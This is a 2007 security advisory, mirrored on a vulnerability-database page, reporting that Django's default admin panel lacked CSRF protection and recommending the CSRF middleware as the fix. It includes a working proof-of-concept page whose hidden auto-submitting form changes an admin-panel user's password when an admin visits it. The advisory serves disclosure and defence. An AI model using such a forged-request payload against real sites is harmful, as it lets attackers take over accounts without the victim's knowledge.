Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

django-csrf.txt

🗓️ 30 Oct 2007 00:00:00Reported by J. Carlos NietoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

django admin panel CSRF vulnerability fi

Code
`  
Author: J. Carlos Nieto.  
Date: Oct 21, 2007  
  
There exists a security hole in the default django's admin panel.  
  
Background  
==========  
Django is a high-level Python Web framework that encourages rapid  
development and clean, pragmatic design.  
Django has an automatic admin panel that allows a person with admin  
privileges to modify the database tables, it allows to change any user  
password too.  
See more at http://www.djangoproject.com  
  
Summary  
=======  
django has, by default, no CSRF protection, this may allow an attacker  
to change any user password by tricking a victim with admin privileges  
into a special forged web page (even in a a totally different server)  
that sends a request to change the password of the user with id = n. The  
victim does not know that the form was sent. If the victim has admin  
privileges the exploit will succeed, otherwise nothing will happen.  
  
Severity  
========  
Mild. This problem exists only with the default installation and can be  
easily solved using a middleware found in here:  
http://www.djangoproject.com/documentation/csrf/.  
  
Proof of concept  
================  
<script type="text/javascript">  
window.onload = function() {  
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";  
  
var pass = "funky";  
  
var param = {  
password1: pass,  
password2: pass  
};  
  
var form = document.createElement('form');  
form.action = url;  
form.method = 'post';  
form.target = 'hidden';  
form.style.display = 'none';  
  
for (var i in param) {  
try {  
// ie  
var input = document.createElement('<input name="'+i+'">');  
} catch(e) {  
// other browsers  
var input = document.createElement('input');  
input.name = i;  
}  
input.setAttribute('value', param[i]);  
form.appendChild(input);  
}  
document.body.appendChild(form);  
  
form.submit();  
}  
</script>  
  
<iframe name="hidden" style="display: none"></iframe>  
  
  
Solution  
========  
Use the django's CSRF protection in all your applications. Take a look  
at http://www.djangoproject.com/documentation/csrf/.  
  
  
Disclosure Timeline  
===================  
2007.10.18 - Vulnerability found  
2007.10.18 - Vulnerability reported to vendor  
2007.10.18 - Vendor response  
2007.10.21 - Advisory release  
  
License  
=======  
  
Copyright 2007 J. Carlos Nieto  
  
The contents of this document are licensed under the Creative Commons -  
Attribution / Share Alike license.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4
djangoadmin panelcsrfvulnerabilityfixsecurity holeautomatic admin paneluser passwordweb framework
34